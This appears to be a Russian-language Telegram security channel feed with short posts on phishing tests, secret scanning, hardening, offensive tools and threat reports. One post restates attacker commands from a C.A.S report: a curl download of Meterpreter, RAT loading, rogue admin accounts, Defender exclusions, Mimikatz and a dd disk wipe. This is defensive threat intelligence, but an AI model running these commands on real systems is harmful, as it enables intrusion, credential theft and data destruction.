Пошаговый процесс создания и запуска фишинговой кампании с целью тестирования и улучшения безопасности организации.
https://blog.onsec.io/from-zero-to-hero-phishing-campaign/
https://blog.onsec.io/from-zero-to-hero-phishing-campaign-part-2/
https://blog.onsec.io/from-zero-to-hero-phishing-company-final/
#phishing #security
https://blog.onsec.io/from-zero-to-hero-phishing-campaign/
https://blog.onsec.io/from-zero-to-hero-phishing-campaign-part-2/
https://blog.onsec.io/from-zero-to-hero-phishing-company-final/
#phishing #security
ONSEC: Boutique Penetration Testing Agency
From Zero to Hero: Phishing Campaign. Part 1
Chapter 0: Introduction
Warning: This material is provided for informational purposes only. Only repeat these actions in practice with proper authorization and agreement! The author is not responsible for the consequences of applying the information obtained…
Warning: This material is provided for informational purposes only. Only repeat these actions in practice with proper authorization and agreement! The author is not responsible for the consequences of applying the information obtained…
🔥2
Сегодня обнаружил, что у Grafana есть фича поиска своих токенов в GitHub.
Когда
Ваша Grafana может сравнивать этот хэш с хэшем своих токенов и присылать алерты что токен утек.
GitHub молодцы, Grafana молодцы, все молодцы! Осталось только включить
#grafana #security
Когда
GitHub Secret Scanning находит Grafana secret, его хэш отправляется в Grafana Labs’ secret scanning service.Ваша Grafana может сравнивать этот хэш с хэшем своих токенов и присылать алерты что токен утек.
GitHub молодцы, Grafana молодцы, все молодцы! Осталось только включить
[secretscan]#grafana #security
Grafana Labs
Configure Grafana secret scanning and notifications | Grafana documentation
Detect and revoke leaked Grafana service account tokens
🔥5🤡2❤1
Sara: RouterOS Security Inspector
Python скрипт для проверки безопасности конфигурации RouterOS
#routeros #mikrotik #security #analyzer
Python скрипт для проверки безопасности конфигурации RouterOS
#routeros #mikrotik #security #analyzer
👍8🔥3
DevSec Hardening Framework
Фреймворк и набор плейбуков для усиления безопасности ОС и сервисов
#security
Фреймворк и набор плейбуков для усиления безопасности ОС и сервисов
#security
GitHub
DevSec Hardening Framework
Security + DevOps: Automatic Server Hardening. DevSec Hardening Framework has 51 repositories available. Follow their code on GitHub.
❤3👍2🔥2
facct-shadow-twelve-report-2024.pdf
65.8 MB
«Тени не скроются: Расследование атак группировки Shadow»
F.A.C.C.T. выкатили объемный отчет о группировке Shadow, а также жирный комплект инструментария, используемого в атаках.
#security #report
F.A.C.C.T. выкатили объемный отчет о группировке Shadow, а также жирный комплект инструментария, используемого в атаках.
#security #report
👍5❤1
Шаблоны для построения security пайплайнов. Можно взять какие-то идеи при построении DevSecOps пайплайна
Ещё один
#security
Ещё один
#security
GitLab
Files · main · Whitespots public / pipelines · GitLab
Security pipelines
❤1🔥1
Falcosidekick - коннектор Falco (eBPF аудит сисколов) ко всему на свете - позволит отправлять уведомленния о событиях в мессенджеры, БД, Jira, да куда угодно
И falcosidekick-ui - UI к нему
#falco #security
И falcosidekick-ui - UI к нему
#falco #security
GitHub
GitHub - falcosecurity/falcosidekick: Connect Falco to your ecosystem
Connect Falco to your ecosystem. Contribute to falcosecurity/falcosidekick development by creating an account on GitHub.
👍3
Сквозь тени анархии: разбираем атаки Cyber Anarchy Squad
Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.
2. Execution (Выполнение):
- Запуск команд через MS SQL:
-Процесс cmd.exe запускается как дочерний процесс
- Запуск PowerShell-скриптов:
-Загрузка обратной оболочки Meterpreter через c URL:
-Запуск Revenge RAT через PowerShell:
3. Persistence (Закрепление):
-Создание учетных записей:
-Автозапуск через реестр:
-Создание службы для RAT:
4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
-Добавление исключений Windows Defender:
- Имитация системных процессов:
5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей):
6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
WMI-запросы:
7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}
8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
Выжимку по командам стащил из Linkedin
#security #report
Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.
2. Execution (Выполнение):
- Запуск команд через MS SQL:
cmd.exe /c-Процесс cmd.exe запускается как дочерний процесс
sqlservr.exe- Запуск PowerShell-скриптов:
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1
-Загрузка обратной оболочки Meterpreter через c URL:
cmd.exe" /c cd %appdata% && dir && curl -O [URL]/sdc.exe
-Запуск Revenge RAT через PowerShell:
powershell.exe -WindowStyle Hidden -NoExit -Command
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\<exe_name>.exe').EntryPoint.Invoke($null, @())
3. Persistence (Закрепление):
-Создание учетных записей:
net user admin cas /add
net user admin admin123123123 /add
-Автозапуск через реестр:
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("rpchost", "\"C:\\Windows\\System32\\rpchost.exe\"");-Создание службы для RAT:
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null);
4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
$guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value }
msiexec.exe /x $guid /quiet
-Добавление исключений Windows Defender:
powershell Add-MpPreference -ExclusionPath '$windir\$system32'
- Имитация системных процессов:
С:\Windows\System32\svxhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей):
sekurlsa::logonpasswords6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
net user
systeminfo
net localgroup
cd %appdata% && whoami
WMI-запросы:
SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor
7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}
8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
dd if=/dev/zero of=/dev/[VOLUME] bs=4M
Выжимку по командам стащил из Linkedin
#security #report
Securelist
Хактивисты C.A.S атакуют российские организации при помощи редких RAT
Эксперты «Лаборатории Касперского» разбирают атаки группы C.A.S, которая использует редкие троянцы удаленного доступа и публикует данные о жертвах в открытых Telegram-каналах.
👍6🤔2👎1💩1🤣1
GitHub Actions Pipeline Enumeration and Attack Tool
GitHub recommends that self-hosted runners only be utilized for private repositories, however, there are thousands of organizations that utilize self-hosted runners. Default configurations are often vulnerable, and Gato uses a mix of workflow file analysis and run-log analysis to identify potentially vulnerable repositories at scale.
#security #github
GitHub recommends that self-hosted runners only be utilized for private repositories, however, there are thousands of organizations that utilize self-hosted runners. Default configurations are often vulnerable, and Gato uses a mix of workflow file analysis and run-log analysis to identify potentially vulnerable repositories at scale.
#security #github
GitHub
GitHub - praetorian-inc/gato: GitHub Actions Pipeline Enumeration and Attack Tool
GitHub Actions Pipeline Enumeration and Attack Tool - praetorian-inc/gato
🔥2
Интересное расследование от команды безопасности Google:
- малварь использует Google Calendar как Command&Control Center. Оператор (человек) создает в календаре событие с зашифрованным описанием. Малварь читает, расшифровывает и выполняет команды из шифра
- чтобы запутать дизассемблер адрес функции был запрятан с использованием переполнения буфера. То есть программа ссылается на "несуществующую" область памяти и выполняет код оттуда.В реверсе я не силен, поэтому тут мог грубо напутать, если есть гуру - пишите в комментах что там было
#security #APT
- малварь использует Google Calendar как Command&Control Center. Оператор (человек) создает в календаре событие с зашифрованным описанием. Малварь читает, расшифровывает и выполняет команды из шифра
- чтобы запутать дизассемблер адрес функции был запрятан с использованием переполнения буфера. То есть программа ссылается на "несуществующую" область памяти и выполняет код оттуда.
#security #APT
Google Cloud Blog
Mark Your Calendar: APT41 Innovative Tactics | Google Cloud Blog
🔥5
Mikrotik Ninja
Вас тоже бесят чуваки с блутус колонками повсюду? Вы знаете что делать #bluetooth #security
Уязвимости в Bluetooth чипах, позволяющие завладеть устройством.
Уязвимо большинство популярных наушников:
Beyerdynamic Amiron 300
Bose QuietComfort Earbuds
EarisMax Bluetooth Auracast Sender
Jabra Elite 8 Active
JBL Endurance Race 2
JBL Live Buds 3
Jlab Epic Air Sport ANC
Marshall ACTON III
Marshall MAJOR V
Marshall MINOR IV
Marshall MOTIF II
Marshall STANMORE III
Marshall WOBURN III
MoerLabs EchoBeatz
Sony CH-720N
Sony Link Buds S
Sony ULT Wear
Sony WF-1000XM3
Sony WF-1000XM4
Sony WF-1000XM5
Sony WF-C500
Sony WF-C510-GFP
Sony WH-1000XM4
Sony WH-1000XM5
Sony WH-1000XM6
Sony WH-CH520
Sony WH-XB910N
Sony WI-C100
Teufel Tatws2
Эксплойта в паблике ещё нет. Но молодежь с говнорэпом из блутус колонок очень очень ждет его. А ещё тут скоро будет запись доклада об этом
#security #bluetooth
Уязвимо большинство популярных наушников:
Beyerdynamic Amiron 300
Bose QuietComfort Earbuds
EarisMax Bluetooth Auracast Sender
Jabra Elite 8 Active
JBL Endurance Race 2
JBL Live Buds 3
Jlab Epic Air Sport ANC
Marshall ACTON III
Marshall MAJOR V
Marshall MINOR IV
Marshall MOTIF II
Marshall STANMORE III
Marshall WOBURN III
MoerLabs EchoBeatz
Sony CH-720N
Sony Link Buds S
Sony ULT Wear
Sony WF-1000XM3
Sony WF-1000XM4
Sony WF-1000XM5
Sony WF-C500
Sony WF-C510-GFP
Sony WH-1000XM4
Sony WH-1000XM5
Sony WH-1000XM6
Sony WH-CH520
Sony WH-XB910N
Sony WI-C100
Teufel Tatws2
Эксплойта в паблике ещё нет. Но молодежь с говнорэпом из блутус колонок очень очень ждет его. А ещё тут скоро будет запись доклада об этом
#security #bluetooth
❤4🤔3🔥1
Cybershit
🐐 Kubernetes Goat — наверное самый популярный проект для изучения безопасности Kubernetes. Круто, что благодаря сообществу они продолжают развивать и добавлять новые сценарии. Например недавно добавили лабы для изучения Cilium Tetragon и Kyverno. Большинство…
Damn Vulnerable Kubernetes App
Аналог Kubernetes Goat для похека k8s из уязвимых приложений. Пока только три челленджа:
1. Hack The NFT Museum
2. Enterprise Grade Network Debugging Console
3. From App-Level CVEs to Full Cluster Takeover
и большой воркшоп Hands-On Attack and Defense где рассматриваются разные темы для специалистов разного уровня подготовки - от деплоя приложений до эксплуатации Ingress NightMare
#k8s #security
Аналог Kubernetes Goat для похека k8s из уязвимых приложений. Пока только три челленджа:
1. Hack The NFT Museum
2. Enterprise Grade Network Debugging Console
3. From App-Level CVEs to Full Cluster Takeover
и большой воркшоп Hands-On Attack and Defense где рассматриваются разные темы для специалистов разного уровня подготовки - от деплоя приложений до эксплуатации Ingress NightMare
#k8s #security
GitHub
GitHub - Alevsk/dvka: Damn Vulnerable Kubernetes App (DVKA) is a series of apps deployed on Kubernetes that are damn vulnerable.
Damn Vulnerable Kubernetes App (DVKA) is a series of apps deployed on Kubernetes that are damn vulnerable. - Alevsk/dvka
🔥3❤2
https://github.com/infinition/Bjorn
Bjorn is a « Tamagotchi like » sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT.
И статья на ксакепе о нем
#security
Bjorn is a « Tamagotchi like » sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT.
И статья на ксакепе о нем
#security
GitHub
GitHub - infinition/Bjorn: Bjorn is a powerful network scanning and offensive security tool for the Raspberry Pi with a 2.13-inch…
Bjorn is a powerful network scanning and offensive security tool for the Raspberry Pi with a 2.13-inch e-Paper HAT. It discovers network targets, identifies open ports, exposed services, and potent...
👍5
Огромная база паролей с поиском по хэшу и c API. Ещё и бесплатно
https://weakpass.com/
#security #password
https://weakpass.com/
#security #password
👍8❤1